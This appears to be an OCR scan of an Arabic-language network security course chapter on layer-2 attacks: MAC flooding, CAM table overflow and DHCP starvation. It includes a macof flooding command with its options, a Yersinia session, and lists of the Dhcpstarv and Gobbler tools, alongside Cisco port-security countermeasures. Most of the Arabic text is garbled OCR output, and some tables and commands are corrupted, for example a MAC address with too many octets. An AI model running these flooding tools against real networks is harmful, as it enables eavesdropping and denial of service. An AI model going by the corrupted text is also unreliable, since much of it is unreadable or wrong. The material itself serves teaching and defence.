(jl Llj > >n V j l^Lal^ j ^1 ALfllauJl j <Loj^<Jl jj^Jl dA£^)^/ c - il qq, V^l (j-d A^joij (JjViunui (_^i3l djUUJ] c_jal^<Jl CjjjJI j& 

' CDP< VTP' STPJ^ Layer 2 protocols cjVj^jj jjJ <jUiJ J Jx^ ^jL Vj source port jj^ 

. PagP'DTP 

4^-^31 (jjoib ^ j^jj c5^l jW^^ sniffer ^—^-^ cJ^^ lsj^i ls'^ jfi jjj^^ ^5^* ^ b * ^ ^ ls'^ j& ^jj^^ I^a 



SPAN port is a port which is configured to receive a 
copy of every packet that passes through a switch 



When connected to the SPAM port., 
an attacker can compromise the 
entine network 




Protocol ArtaJyz&r 



IDS 




Hast Host Host Host 



SPftN Port IDS port 



Host Host Host Host 
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MAC Attacks 8.2 



Jjil^j jl till ^jujj c^ill j j» cs^f^ j& Sniffer -Mj ^-^-^ <jiat jiict Sniffer ^ '^-M-^ 

<L^)iaj a ikiLujj Sniffing ^ ls* *3<^*ti ^\ laal a£jjoJ! j>J Uj jjIS ~ laJLujj Sniffing .5^juJI jjj-* 

1VIAC Flooding .^^c (j^Iaj Sniffing .j^l tdAiLJtj 4 jjuJI < ** >1 <JiLa i » ^ » ^ It CjU» jla^Jt 4ijjui <JiLa jjIS jjc. 

.Sniffing cjLSj c> s^l j 

.MAC *U s^bja^l jjjI^iIIj cMAC Flooding <^t j^l 'MAC \:° v; ^ ^^lai^JI clAjjSj]) t*U ^ILj ^all 11a 



MAC Address/CAM Table 

l£ ^j* J^A? cs^ (hardware address) ^ j^II j* j Media Access Control -5 jU-a^l ^ Mac 

64£jJo3I ^j^jjjjjuj ^^ic (Jjti ^iiAj MAC 4<^i ^Jc. jl^. .(a^jj^JI Cjj\£) 4£jJo3I ^ (node) & , -^ c ' 

(jjdfij La^J (jjj^£ ^ J^-J ^>^^ L a OO^' <^1^J C5-^^ 4^Jjuj d <J£ .A£jjuo3I ».vv%, ^ S^t j (JJJ*J (j^uJl 

JS* CjUjIxJ! jj j^L ^jL <jj .hub ■!! <ij*3 ^ ^ j content addressable memory J J^lkt ^ CAM 

Catalyst switches *JaJ CAM J f^^j VLAN CjUI** iallJI ^ Sja ii*lt MAC l^j^ 

<j ^UJt iaiJI j ^ CAM Jj^ MAC ^ .j^^ 4£±A <L^alJ i Sj^iU MAC ols^ cl^j^ 

.dijUi CA1VI <J -^—^j^] ^^j^ 3 ] cJ^j^ u^j^^ '^-^ jlx-<JI ^ 

RAM o-te ^ <^^ 1 RAM ^ opposite ^ ^j^j s j^'^' (> ^ S J^ > CAM 

VRAM lh^ jk JiUlj 

C . illaJ Ld^JC ^aJ ^j-d j l^j djULiill Ql^j^JJ (Jjistjulill ^aUaj ^aj^J (RA1VI) jjuIsJI 
l^jj j^JJ fjL c _^j3I djULlJl ^1 ja! iaSl^. (jj^J (jl cJ^iJlill ^aUaj (jl I^A ^5^-^ J 6 1000 (j' J^*"^ ^5^* ^^U^ 2! J^J^^ ^ 

^ dla^JJ Igili l^la CjUUj L-AL ^jj La^JC Liajl RAM j-u^Jl SjStilt jli J£ I^A (JjjJj .(RAM) jj^xJI ojSlil! C5 ic^ 

.CjUUJI (j-aUJIlOOO u' ^ 3K»»i^t CjUUJI 

tit <*JJJUJ <9JjIaJ I g AO dlaall J ^ajL SjSlill (j-ft ^ jilt ti& <J ClAiUj J^iLudl ^allaj L-AL Hxi CAM <^ J^* 1 ^ ^jSl 

CAM searches the entire memory in one operation 

^^UJ t*Uij RAM (> liUl jSl J 

CAM lU^j Binary CAM CAM c> ^ j* o^jJt ^ CAM u 1 liA c> 

.lj 0 cj^UJt ^t^ki^U 

43 Bit Hexadecimal Number Creates Unique Layer 
Two Address 




Mill 



125S.35S2.SDAB 




First 24 bits = Manufacture Code 
Assigned by IEEE 



OOOO.OaXX.XXXX 



] o c 



Second 24 bits = Specific Interface, 
Assigned by Manufacturer 



OOOO.OaXX.XXXX 



3 



Broadcast Address 



FFFF.FFFF.FFFF 



U— —L 



https://www.facebook.com/tibea2004 



624 



?(How Cam Works) CAM J) uLS 

http : //w ww . f reetechexams . com : j^iJI 

ial_L<Jl Q±l CjVIj^jVI lafll L— _^jjjjjjjoj dljjjjl (j-G D^cLaui £A ^AaajujJj CjIjjI^aI] ^^fLixilip <J£juJ| jjJjoLi CA1VI <J J-^?^ 

^Jc. <j Jj^al<Jlj <1 JjLLai^ iiixJIj a£jJo3I C5 ic o^ixj (j^aliJI t*lL* ^jl jixJI) MAC <jl CjI jLoiaj lafllaj CAM table 

(jjUjjjuJ! q\a jA ^ a jjL^ii <^^j MAC u^j^" CA1VI lSj'-^^ c3^^)^] l! 1 l^j . \? w ^ c ^ ^ t° o^j^^ (u^j^^ 

Jld (JjlxJjoiJ (j^^i^l .J jj^akxJl L_flJjJa*3l djUUJl J jj^a j (jLdjJa <J^I <>a <Lj]a3l £>i^j J-dXJ CAM table .HUB c^j 

13 bSljiuUll (j^jjoJU JL^jVI C5 i^ Ijii ^VJI /^i>*ll t>v c> CAM Jj^ ^ 

.CjUUJI rurtuW a! j^oij ^j^j <ula ^Ethernet segment 



MAC 


PORT 


KB 














MAC A 



ARP for B ■> 



CAM Table 




ARP for B 



M AC B 



MAC C 



MAC 


PORT 1 


A 


i 


B 




c 





*<— I am MAC B 



<- J am MAC B 



MAC A 



A is on port 1 

tgjrn: B- tt ot* port Z 



IVIAC B 



MAC C 



MAC 


PORT 1 


A 


1 


B 


Z 


c 




CAM Table 



Traffic A -> B 



Traffic A >B 



MAC A 



B is- on port 2 



0Sr 



Docs not sec traffic to S 



JV1AC B 



IVIAC C 



?J-al£JL CAM Jj^ cj&aj liU 

Aj^UJI dj^LiU-All j ^j^jjjjjaJI iaLLa ^^ic Sja jl<JI MAC CteJ^ j^*-* CAM J j-^ 

^ j^JI pLL tilj^oj ^ j^Jl tikJL^ 11a ^hviJ cilj£ a) fus a-s^\\ ^ * j^-a CAM J jl^JI ^ jSS j 4JajjjJt VLAN 
J j MAC ojj^ c> ( ? MAC Flooding .MAC Flooding c> $^L^ ^ 

4_i^uJa3l t auU^I ^ <iujjJl CjljUaVl j MAC L^J^ 3 ^ CAM Jj^ Sj^l ( <^^^ C^^^ ^J^^ ^-^J^ 

:CAM Jj^ cjlc- J^] uj^ >>> Ullj^ 



¥ 15 on Port 3 



MAC PORT 



Y 3 
Z 3 
C 3 




Traffic A ->B 




MAC B 



MAC A 



Z Is on Port 3 



Traffic A- ->B 



MACC 



MAC C can sh the traffic from A to B 
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MAC Flooding 

^ JslI aAJahjxA] £>i& ,a£jjoJI j\ A^u'iM ^laa iaj^j ^j^j ^ill j 4£jjuJI ^j2L^juj <j^l jjl jlkV *La^vim^l 4 j vffll MAC flooding 
'hub ls^ 0 ■ CAMJj^ (S^- u>* o^L*^ ^ <y-aJI 4_pLJI iaUJI Jl s<^i MAC l&j^ u^*^ 

d^j^a Sj^li iSj^i (J^J^^ A cJ^-^- (j* J^^^ ^ajsu* Jl jj V 6(j^Jj .hub (3-^ 4<^.* ^ <jjtLJL ULal jj£I 

ajjSjII .AjLj^all U^j^ i> j^' MAC cl^j^ W^'j^' (4j hub J) Jj^s ^ c>j MAC u^j^ Jj'^ 

.MAC Flooding j- w * ^jj^J 4_^Lai^ Cjli (jjiijjjuJI Jc ^Lajtall 4£jjuJI c > >i Jalij (J^UiLujV <Lg,i^jjuia3I 

4 K > f >i ^ j^-laj V jll jjj^a>JI MAC o^j^- cijUlkj ^j^lLjjoJI (jljc-l Jc- MAC Flooding ^h^j l5 

(J^lLjjoJI C5 1c ^j^.1 djUlla ^1 t J^1£3U MAC u^j^- J J-*^ u' ^j^-^ ,iLftl£ MAC o&j^*-} <-5 j^ 1 ?^ ^ci* A 
^ J) ^ fj^j hub failopen mode <*^jil J .failopen mode J Jj*^l 

Attackers perform MAC flooding to gain system passwords, access to sensitive data such as protected files, 
emails* and instant message conversations 




MAC Address Flood 



Attacker Switch 

s 



User! 
A 




MAC Flooding Switches with Macof 

http ://monke y. or g : j^-a^ll 

^Jtdjj ttillil A a^ilj .(jLdVl 6^3^ U^J 'e-t^V! (S !>L^al A aax^a ^jjjjJjjuJU <j^aLaJI 4^ jlill 4_i^aL^. ^jl DjLujVl 

W^j Uui ialixJI ^^ic jj^Jl ^^>^ lS^ ^— ^ u^j^^ l5*^ ( ♦ 1 - u1> l- clA^ tdiVl^JI o^asu t^^kl SjUxjj .hub 

.hub ^ 

djVU.^VI J jj^a jll jl S^ljSSI Sj^lS jjc^ ^j^aj U l^Jla j MAC cl^j^ ^ (i'j^-'j fij^'^l 6 ^ iilLuiV 

4^^)^. CIdj 4 lal i oJ J£j ^jjIijjjaJlj t^ix-a ^jl jixl - gall CjjjJ! ^AaJ 4 i£ V (JjUjjjuJI ^jV .CjIjjjJI (jg& 1VIAC ^ ^ ^ 1 

a£j^. Aja. jj ^ ^j^LijjjaJI JJas 4 lal > njj ^^-istj fail open f jg^a ."fail open" ^-a^a ji ^ ^ ^^>sj .^LlJI jj^>^^ 

.iallJI 4il£ ^glc J^jj 'hub ^ t3^>^l jjj^I 

<Lj]a3l j/Vi fail close ^ j 1 ^ ^ j ^^ill LijLJjijjjaJI ."fail close " ^ ^U^lLjjoJI (j^aau ^l^cl ajj ^jU Jc (jj^i (jl < ; 
4JaLauj tiaLL<JI Ail^ Jc jj^Jl ^^>^- lS^ ^— ^ (jl V^j (j^LjjaJI ^jl c_ _(jjjjjjjual3 fail open cJ-^ ^ a 4j.u£tJ1 

Ij^li du£ lil lLli^ , ji& ( . nr> 4jJ ^l^cVI I^A ^jli t j^Ia jl ^jljlkl jn^ a£ ^jli ttilli ^ j .UiLdj jj^Jl ^J^- (jc L_fl3 j!i3l 

iklj (jl (jjud^Jjoi^Jl ^j^a ,4£jjaJl JJ^ ^^>^- Jc dl> gaUl] D^iixJl t fljl jll ^j>i ^jAslSI j3 jj ^^jII CjIj^VI (j-a 6 jllxui <C j^^ o ^^Jfc Dsniff 

'macof W^j 'Dug Song dsniff cjIj^Vi <> s^lj .dsniff ^ 4 ^ > ^^ t JjIjjIIj cjIj^Vi <*^l ci^jJI 
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(jjjjjjjuJ! <jl£ tfail open ^ j > ^ ^ o^j^^ ^1^1 ^ lij .4^1 j-u^JI ]VIAC l>* WVI ^ (jjiijjjuJ! Jjljc-] c _ 5 ic U3 j^jj 
^j^jjjjjaJI ^ ^jUlSjVI jjJI c . \\*'\\\ till ^-<ujjj l_s jjoj 11a j .ialldll ^^Jc jj^Ji ^j^- lS^ ^— hub uj^ '^£J j** 
<J£J 13b000) lMl^A? o- 3 ^ CAM J j^ staVl ^ . jl^aJI >^ ^1 jj>* J£ c^-aSl! j 
}Ji jUl jiLl ^ ^JW! j^Vl jl^-aj (Jjj^ > W 6g _K ^ Macof ^ jj> MAC ^VU^j JL* jj JjjL <> 

macof -i ethO -s 192.168.18.130 -d 192.168.18.2 

^jjjUc j>» (Jljc-jj macof g-a^-o^ ^ .^^-o^ e-lciLuiV "macof" ^I^JLuit ^jj t^UI JtLJI ^ 

.<lo MAC OLS^ J^jj fV 1 <J^^' ^ O- 3 ^ JJJ*^ A^JI AiUaJ ^j^j] jjjxjII J>lkU .MAC 

JUg Jllll <j£Ja3l U^J (J^l^Jl ^ J^g-^ L>* c J' 4-6-^" J^ ^J^j] "-d" J^f*^l ^l^Vlm! ^1} . j.'U^l <jt jJC ^j^j] ^^h»J "-<§" 

6 jjt > <c. j^ ^ j ^macof ~ i^jLuiaSI (^^-^ 

Command Prompt El! 

~1BI 



1 H : t*l - 33- r 19 vfl5 : 15 13; 3. "5 £ r fib ! 15 = e=J O . D _ O .*» _ 3 5CH :* 0.0.0 O . R fi5 5J : S 5 fiSf3 TJ U^fi : 1 3 1 <5 {O] v£ n 5-1 3 

13.J 3f = ■hLli j35: 95 6C j afa . 6d l « : bS j BS O.Q,0. G.45 638 :> O . G . O . O ^ 456fi : 3 12^58^152 : !OJ wis. 512 

t2;Z£^S;12:*e=Z 12 i« : 31 :SS : 41; 15 Q,0,g,Q,«»« >■ U , C . (J. O, & J3 J ff? 99 51 S « ?T i£13Q ( & ] -HhlLaa 512 

23:«3;5c:92:af B^:l2 Irvoidd O , a, O . O , 45313 a- O , O . O - o _ Z9 5* i s 36B*i?5«a7t32!ii«74lJ5 CO> win 9L-3 

.2;a:b^:fldL&l:2> S« cnai f« ell : Sd: d£ O . 3 . . -C _ 13 IS * > ft . C . O _ * ^ T& S3 3. : S 12 3 G5 O JSO : Ji>S05 2Ll7Sf &) vi^ ilJj 
D Qi I 11 I I WJ' I U □ I *5] 5f : «d: 3d. : JL2" : u O.O.O.O. 123 > D <> . O . J ; S 3 32 2 6S 54 J.Z : B523 &3 374Z [■□ J nn 51 S 

■ 9- 4Hd.r-«e-; 5a ; S-d = *d b4i kd ■ 5f : 14 :*9: «d D.O.O.O. 33£BS >■ d.O.D C 454BC: B IS 3 IBH 54 135 : 3 SB 1 4 57SS (-D J win 513 

■ A]BS:lB:Z9j3:ft 2 & : 3S : m B : M. S *.! : O . O . O . O .23615 ^- C C .Q.Q DWa*: M D 93347 41 33 E 3« H 3Z L43fi (O ) IfAn SH^3 



#macof [-i interface] [-s src] [-d dst] [-e tha] [-x sport] [-y dport] [-n times] 



-i interface 


Specify the interface to send on. 


-s src 


Specify source IP address. 


-d dst 


Specify destination IP address. 


-e tha 


Specify target hardware address. 


-x sport 


Specify TCP source port. 


-y dport 


Specify TCP destination port. 


-n times 


Specify the number of packets to send. 



j l dbau] C5 ikj3! (Jj^j Lg^jc- iaaa Ajjilll a I iklujl ciLlc 



MAC Flooding Tool: Yersinia 

http://www.yersinia.net : j^^JI 

I jUaj L^jL ^Uajj l^Jl / alia all CjV j^j^ ^ L_axjja3l Jallj (j^asu s^liiuiiU a ^ ^ - ^ ^ 4£jjuj sbl Yersinia 

.<-JajVl j djl£^JI jbikl j JJ^j] (framework) 

Spanning Tree Protocol (STP) 

Cisco Discovery Protocol (CDP) 

Dynamic Trunking Protocol (DTP) 

Dynamic Host Configuration Protocol (DHCP) 

Hot Standby Router Protocol (HSRP) 

IEEE 802. 1Q 

IEEE 802. IX 

Inter-Switch Link Protocol (ISL) 
VLAN Trunking Protocol (VTP) 
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<. for tornac@wasa... I Correo S21 sec I /horne/tornac<1 > I /horne/tornac/work/proi... I 



/horne/ to /p roj... | | 

prodigy:/home/tomac/work/projects/yersinia-sf/yersinia/yersinia/src# telnet localhost 12000 
Trying 127 t 0 + 0 + l +t+ 
Connected to localhost. 
Escape character is "T. 

Welcome to yersinia version 0.5.5.1. 
Copyright 2004 Slay & Tomac. 



login: root 
password: 



|/horne/tornac/work/proie...| 



M0TD: Do you have 



yersinias en 
Password: 



xicon LX-7? Share it! 



rsinia# 


sh 










attacks 


Show running att 


acks 








cdp 


Cisco Discovery 


Protoco 


L (CDP) inforn 


at ion 




dhcp 


Dynamic Host Con 


f igurat 


ion Protocol ' 


DHCP) 


inf 


dotlq 


S02.1Q informati 


on 








dtp 


Dynamic Trunking 


Protoc 


jl (DTP) infor 


mat i or 


l 


history 
hsrp 


Display the sess 
Hot Standby Rout 


ion com 
er Prot 


nand history 
3col (HSRP) ir 


format 


,ion 


interfac 


;es Interface status 










stats 


Show statistics 










stp 


Spanning Tree Pr 


otocol 


ISTP) informat 


ion 




users 


Display informat 


ion abo 


jt terminal 1] 


nes 




version 


System hardware 


and sof 


:ware status 






vtp 


Virtual Trunking 


Protoc 


3l (VTP) infor 


mat i or 


l 



yersinia* sh ver 
Chaos Internetwork Operating System Software 

yersinia (tm) Software (iSSS), Version 0.5*5*1, RELEASE SOFTWARE 
Copyright (c) 2004-2004 by tomac & Slay, Inc. 
Compiled Sun 07-Aug-2005 21:10 by someone 

yersinia uptime is 51 seconds 

Running Multithreading Image on Linux 2.6.12.3 supporting: 

01 console terminal (s) 

02 tty terminal(s) 
05 vty terminal(s) 

yersinia* sh users 

User Terminal From Since 



* root 
yersinia* | 



■ :: ::. • ■ 



r 



MAC Flooding Tool: Scapy 



<illi£ j jj ^ > * q * j ' sniff (O^ lS^j^ ^AaajauiH o^-^ uj-^W lt^^ .-^^ u >i< ^ lS^^jII ^ > ^ ^ atal ^ASu^ 

.CjI^JjuJI ^\ j £JJJ j c LujJ^J q\ £j laJ > uJ Jill CjI j^VI ^.lAiJ ^ajujJ 4_iLli3l £>i& j '^-AjJjjj 

< tcpdump* NmapJ *l j^l cs^j pOf * arping* arp-sk< arpspoof^^j < HpingSj^Jt sbVI u' 

. string Jlj loop Jt J ^ v^" .. n u' <y^^ <>d£k ^ ^ J** * J^°) 2-*^ J^' u' ■ tsharkJtj 



MAC ^U^fSI -l^a jilJj 

MAC**-^ ^-9-^ j^jolloj l^istjjaj ^^jII ( port security ) ^sUaII ^1 *^ 'o^j^ ^ ^'^^ dlj£ 

^joij Jill j (JaxJI CjLL^q ^ MAC u^j^- '^^j *^\* 6 ^^-^t cJ^.i Port security 

!c5 jVI£ WVI j^I^U J^V! cj^j 

,<iaVt MAC L^J^ C5^oSVl Jj J J^ 3 jJl ^ S^J r4j 

. JlLjjoJI J sj.w<ftll MAC l^j^* C5^) J J j^-^ cj^^ <Ja^J3 MAC l^^ 3 ^ ^ ^•^c 

Cy* cl^ U^J^*^^ J MAC U^J^ C ' yjj a 1 ^ ^ t^iixJl Jc 4_L<il ]VIAC cl^J^ c ' ls 1 •^^^ ^ ^^>?^ 

:^Vl cj^I ^jU! 
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.(#switchport port-security mac-address) <4*Jb j*\J <iaVl MAC u^j^ ^ ^] 

jjj^aldll 6 j^VU 4j^abaJI MAC cl^J^* (J^j ^_L<J MAC U^J^ f (jW ^UuJl iilj£ «j 

.SNMP trap < J&jj MAC Flooding ^Ua^ <> ^ p 0 rt security 

pbjL ji^u^ LjLiljj^ ^ Port security 

#switchport port-security 

Mac Address -5 ^l^t ^1 <iLjaVU o^jjuJI <jpteJ ^ o^L*^ ^1 <JUJla Port Security ciw ^ jl> 

U^ij j (J^lLjjoJIj JL^ajVI ^^ic j^lill ^i^. jll (Jj^j ^— a jjuj djjjJI J > ^alj l_s jjoj Mac Address djl eg * J 
^Ul! j-^Vl (jiiijjjaJlj JL^aj!>l! ^jjjjj^l t^lLa ^ j^V ^-<u.ni <jl U^jl j3 aJL^. ^ L*l Mac Flooding ? ^ j* 
#switchport port-security maximum 3 vlan access 

^Ull J-^Vl ^ J^l (JjjjJjJuJl (J ^llalalJ 

#switchport port-security mac-address 00-11-22-33-44-55-66 

tilUJI JjI^jolL ^jjjjjjjaJI ^>f^i j Sticky^-^ u^j-^ ^ £J ^ * ^ lS^j^ j ^ 1^ ^jl cj^. j j] 

j^V! Static Mac Address ^ ^jjJt ^ o^j^ 

#switchport port-security mac-address sticky 
#switchport port-security violation restrict 

restrict ^protect 'shutdown ^ 

#switchport port-security aging time 2 
#switchport port-security aging type inactivity 
#snmp-server enable traps port-security trap-rate 5 




DHCP ATTACKS 8.3 



j\ JL^ajVI ^SaA jjj-a db^aiilU ^lxujjj c _^j3I 6 MAC^W^j Ailia^lt sniffing ^ liuifllj ^13 

djU^A t£)[JCP lUc- ^jaill 11a c .sniffing 

csSI^jjI >j c DHCP^W^ 

.DHCP ^ ^la^ll j ^rogue server j starvation ^ ch\ j^Vl j 'DHCP starvation 

?DHCP (>u uL£ 

Jj^jjjjJ! tiA .RFC 2131 'Dynamic Host Configuration Protocol J jU^I y> DHCP 

^ jLjaSli dVU .TCP/IP ^ c> Workstations J Hosts J» IP ojj^ 
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J£al> ojjUJI ^-H ^) t> jSSV IP u'j^ ^t^j^t (IP address conflict) ojj^t 

default gateway ^£±^1 ^1^1 4ll*i<JI csj^Vl CjU Liajl DHCP ^ 6 IPu^ <J] <sL-^yU 
. (traffic broadcasting) ^ J ^UA> <ci^]l DHCP jW ^ ^ .subnet maskj 

j^J < Lij^q Jj ^I^VI CjU jlx-d jj><^ jUal jjs jj ^ 4£jj^3U JL^aj^U jjau u^U jp djbl^l (j^il DHCP ^l^klujl 
kaijj jjgn^ti IP ^Jjj .< qVi^ ^1 j jl ^ jill L >ij J ^UJI Jj l-iIL *t£L DHCP f j^. TCP/IP^f^ 1 

.lease offer J J^ DHCP ^ill *:>Ux]] a<^\ cjbl^l j^jj <ul 

:(DHCP Lease Stages) j*> IP OtjS* J*t>* 
^ uVj IP ^ (DHCP DISCOVER) UU» broadcast lUj^ :DHCP DISCOVER lJU^VI -1 
jl 0.0.0.0 j ***jM u»>^ 255.255.255.255 ^ DHCP ^ u'j^ IP jlj^ ^ V 0-~j| 

.*£*51l Je. s ja jUl DHCP (Ol > Jl (unicasts) ^ J ^ ^ <>j J^l <^U= J=£L DHCP-relay agent -2 
(DHCP OFFER) *Vj J^jU pJ B DHCP ^ J] DHCP DISCOVER J^o^ :DHCP OFFER lP=j*1' -3 
J*«J1 MAC u 1 j^ 1 - network mask ^ill DHCP IP u 1 :i>^ broadcast J^ Jc- 

ejlc-LoJlj lease period jW^V °- la ~ 
ptU ax, c^.DHCPREQUEST d^M DHCPOFFER J] 0^1 c,^!^ :DHCP REQUEST ^ 4 
i > > h 'l; broadcast JLu> jj (i^j^ u^!r? 'o^j^*^^ u^j^^ ^j^j DHCP c> lP 3 J^«J^ 

u^j^^ ^jj U-^jj^ J^U f^j ojt ^ ^ c5 j^' o^jj^ cr^^ DHCP 5^ -5 

.unavailable ^ ^-j^ Jj^i u^j^^ ^ available u^j^ 

cUj, ^ ^il! ^ikll DHCP REQUEST J^-j ^ :DHCP ACKNOWLEDGMENT j»JVI 6 

.broadcast lS^ ^ij c_j jixJI jl£ lij NACK JjjS ^ jl ACK J t 

J ^jbu l^j^ ^ ^ .c>j^ c> J aJl s^l j u^J) 3 ^ DHCP DISCOVER jj ^ -7 

JLa. Jj ;IaAsu ^jla^ ^jiiAaJ A \j\ a <ul j.<u>.>iJj .AjjIj J^ 0 — 1000 U£ J J ^ lC ' ^A^j (Jj^^ Jj ^i^aj 16,13,6 J 3 ^ 

.DHCP Troubleshooting *U>iVl M*- t» J-^l <4i J^' 

^ jll cjli Ail _jj ? jUJI ^^kloy .^alaJI JJ DHCP DICOVER jV ^jll (port) 67 J^l -8 

^JjIaslSI Jc t . jll <jI j& 68 j^^j j ^ l j& 67 



DHCPDISCOVER <IPv4) / SOLICIT 



Send My DHCP Canf juration 
information 



DHCPREqUEST [IPw^J / REQUEST 1IP-,fc| (Bf^dCd^Th 




I - ------ 



U se r dh cpack ( IPv4) / Reply [i PvS] iuni « it ) DH CP Ser ve r 

Here Is ¥our Configuration 

j subner. Haste: aiS . S55.Z5S 
F-vf M****^ Derault Pjsu-aara: 10 . D . D . 1 

• DNS SBPWZa : 1 . 1(55! .ltd . 2 . 193- . 1SB . 1SH . a ; 
: Lease T±ma : 2 daya I 



DHCP REQUEST/REPLY MESSAGES 

jc. J _ y^aJ3 ^JaioLi request/reply exchange ^l-i^l <j^>j (IP) c±>j±>y\ J j£ jjjjj jljjc Jc J*i3lj c5jisu <^jll jU^JI 
JL* J (> Jx«J! ^i^i jjill Jc tDHCP offer -SI DHCP Jiy .DHCP ^ <> cs >Vl oij^ 1 o5L.U- 
.DHCP Jl c5>Vl CjI j^a p jii-3 Jl jj V IP oijUt Jt J^Jl DHCP V Jll s j^Vl .DHCP request 

DHCP ^LaaL .a£j^1I ajLSI JUjI jajl« ^SL i_ilki Jllj DHCPINFORM ^ J^*H 
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DHCP J$ lij .DHCPACK ^ J\ DHCP 'V^ 1 j^VI cj!>U**1I J/j cj^I^J! ^ 

A^SL ^illj IP jl jixJ ^joJ DHCP (reserved pool) * jj*^* Aiki* y-i y> ^ill jt^ jj& <> request 

-UJ^J j SjJ?^* Alkia ^ IP jJC j <j£ *■) DHCP -C5^W o^j*^ ^ JP*4 DHCP CM 'DHCP 





I DHCPv4 Message 


DHCPuB Message 


Description 1 




Solicit 


Client Broadcast to Locate Available Server* 


DHCPOffer 


Adve rti 


■Server to Client in Re&nortse to DHCPDISCOVER with Offer of Configuration Parameters. 


DUCPRequest 


Reqi i r-ir. Confirm, 
Renew Rebind 


Client Message to Servers Either {a,i Requesting Offered Parameters,, it,-} Confirming Correctness 
of Pre-vi o u s ty Allocated Achlres*., or (<:]• EsrteodinR the Le^se per od 


DHCPAfk 


Reply 


■Server To t lient with ( nnfvgu ration l-'^irameters^ Including E,.nmmrrtP:ri Network Address 


DHCPRelease 


Release 


CI lent to Server fleli ncpiisli ine N prwarfe Arldre-5-s a nd On nre 11 R pmain i ng I e a^e- 


DHCPOeclioe 


Decline 


Client to Servw indicating. Network AxfcJres* fs Afrea dy in^Ji^e 


IN/A 


Reconfigure 


■server tells trie client inac It has new or opda-tc cl configuration setting's. The client then sends 
either a nenew/repry or inforrriarjon-requestyRcply transaction to get the updated Information 


OHCPInform 


Information Request 


Client to Server r AskiisigClnty for Local Configuration Parametecs; C11«rsl Already Has Externally 

C«jn-fiK*JT-t?iJ N*?t wurk Addr 




Rel a y - r a r wa rd 


A relay agent sends a Ptel ay-forwaard rne-ssa^e En relary np^3j Q i to ^erjer^ either directly n r 
through another relav agent 


N/A 


Relav'R^pIV 


A server send s a ReLay-rephf me**a#e to a refey agent containing a menage that the rel.iv agent 

lll-llVl-l V 1t . ■■ ■ 1 14 Nil 


DHCPNAK 


M/A 


Server to CHcnl Indicting Client's Notiwt or N«rb/uo»k AdJrc^y ih Incuried leg . Client Hj» Mwwcd 
trj New So tint- 1] or Client'* Lc-rfve *v Expired 



IPv4 DHCP Packet Format 

IP <jjjUc (JJJ*JJ .^£iJuJl 6 ^l^cl (Jjjia (jC IP A^jJj C5 ic CjVU^ajVl (j^-^ LS^\ J J^JJ^ (DHCP) 

;L_fljUa jll DHCP . ^y^xM ^-i <£jjua3l ^^ic (JU^jVI L — ^ j jii * V CjU* jlx-<J! Ia j^c-j 

u ^j > ^ j^Vlj (delivering host-specific configuration parameters) < ii i ^ l Odj^ ^->^-A*-* jjSjj jA ^Ij 

. (allocating network addresses to hosts)u^^ ojj^ 
aJI^j ^ U£ ^ <jJ DHCP ^ j . DHCP*^ j DHCP DHCPct^ j c> uj 

41^5 ^Uj, ^Ull liA JUlbj ^BOOTP relay agents DHCP ^ .BOOTP 

. DHCP^-^ t- lUI^I J^i c> BOOTP 
:IPv4 DHCP ^> c^^l r*JS Cxh 
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FIELD 


OCTETS 


■ 

DESCRIPTION 


OP Code 


1 


This field contains message op code that represents the 
message type 

OP code 1* represents BOOTREQUEST and H T represents 
BOOTREPLY 


Hardware Address Type 


1 


Hardware address type defined at Internet Assigned 
Numbers Authority (IANA) (e.g., T = 10Mb Ethernet) 


Hardware Address 
Length 


1 


Hardware address length in octets 


Hops 


1 


In general, the value is set to "0" by the DHCP clients. But, 
optionally used to count the number of relay agents that 
forwarded the message 


Transaction ID (XID) 


4 


A random number chosen by the client to associate the 
request messages and its responses between a client and 


Seconds 


2 


JtfLU! tub tflofJaCU bill LC \A Ic \ 1 L UCgd 1 1 dUUICbs dLLJUIalLlurl Uf 

renewal process 


Flags 


2 


Flags set by client. Example: If the client cannot receive 
unicast IP datagrams, then the broadcast flag is set 


Client iP Address 
(CIADDR) 


4 


Used when the client has an IP addess and cna respond to 
ARP requests 


Your IP Address (YIADDR) 


4 


Address assigned by the DHCP server to the DHCP client 


Jtl V ~ J 1 T JMbLJ Ul Cjj 

(SIADDR) 


4 


server's IP address 


Gateway IP Address 
(GIADDR) 


A 


i r ouui c» \j i u ic u n i kz\ o y ogcj i k 


Client Hardware Address 
(CHADDR) 


16 


Hardware address of the client 


Server Name {5NAME) 


54 


Optional server host name 


File Name 


128 


Name of the file containing BOOTP client s boot image 


DHCP Options 


Variable 





DHCP Starvation Attack 



f^iauj DHCP t> x& J^j) <j*L>^ t> DHCP ^ c3>>k 'DHCP Starvation 

4t*Bi <> JSI IP o^j^ lS^ lA^ V fiL*ll (jla 4t*Uil j . DHCP^^ ^ ^ iaAlJI IP u^j^ 

^UlUj tl^j 4_^UJ! ip (JjjUc^ ^j^j ji J jj^aaJ I ^^kiai^ll ji^j V <ii t ^jjjaSl I t ju.ti .denial of service (Dos) ? J] 
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.Gobbler ^ s^L^ MAC ojj^ DHCP ^W^ 3 ^ f ^W*^ 




User 

user will be unable to 
get the valid IP address 



y* -a ^ a* ^ 




v» %■ 



D HC P Server 




- : 

1! 



Ha - . server run^ out of IP 

add re ss e s to a 1 1 oca te 
V"- to vp fid users 

...f.\ JSCv mA 




Attacker sends many 
different DHCP requests 
with many source MACs 



DHCP Scope 
10.1O.10.1 
10. 10. 10.2 
10.10.10.3 

mm 10.4 

• 
I 
I 



10.10.10.2 54 




DHCP Starvation Attack Tools 

.DHCP Starvation jj^l^ll JjS cj! j^Vl Yersinia j Dhcpstarv 

Dhcpstarv *k 

http://dhcpstarv.sourceforge.net 
DHCP leases^J^ <*j^j .DHCP Starvation ^^il ^ jBj ^xS^A JjiJsil ^Ikb ft bi ^ Dhcpstarv 

Yersinia 

http : //www . yersinia. net 

IP ols^ u^ 3 ^ " b y^ (DOS-based packet sniffer) o*j<£\ ^ ru^vi ^ yt> Gobbler 

^UujoII dijjjjj DHCP cj^j^-^ Gobbler - ikiuij .DHCP <*-^f^ j^- l a 4-*^^>^ 4-*^-^ sbVI a - ^ .< ^Ja^l] 
Gobbler ^v^>hj .Jvn^l c ^jja^Il ^ jjl! C5 ic c_ u^aUli ^^ic j^ta (jl 4-ijt£-al i-aL^al ^ '<kc*jjA\ a\<\\a\\ iat_L<JI (j^^qj 
Ai^x-<i till ^ajujj Gobbler .^Jl ^^lA^ DHCP Starvation ^ ^jj LgJ!>Lk ^UJI j^ll dj| j^l ajLiicb 




Rogue DHCP Server Attack 

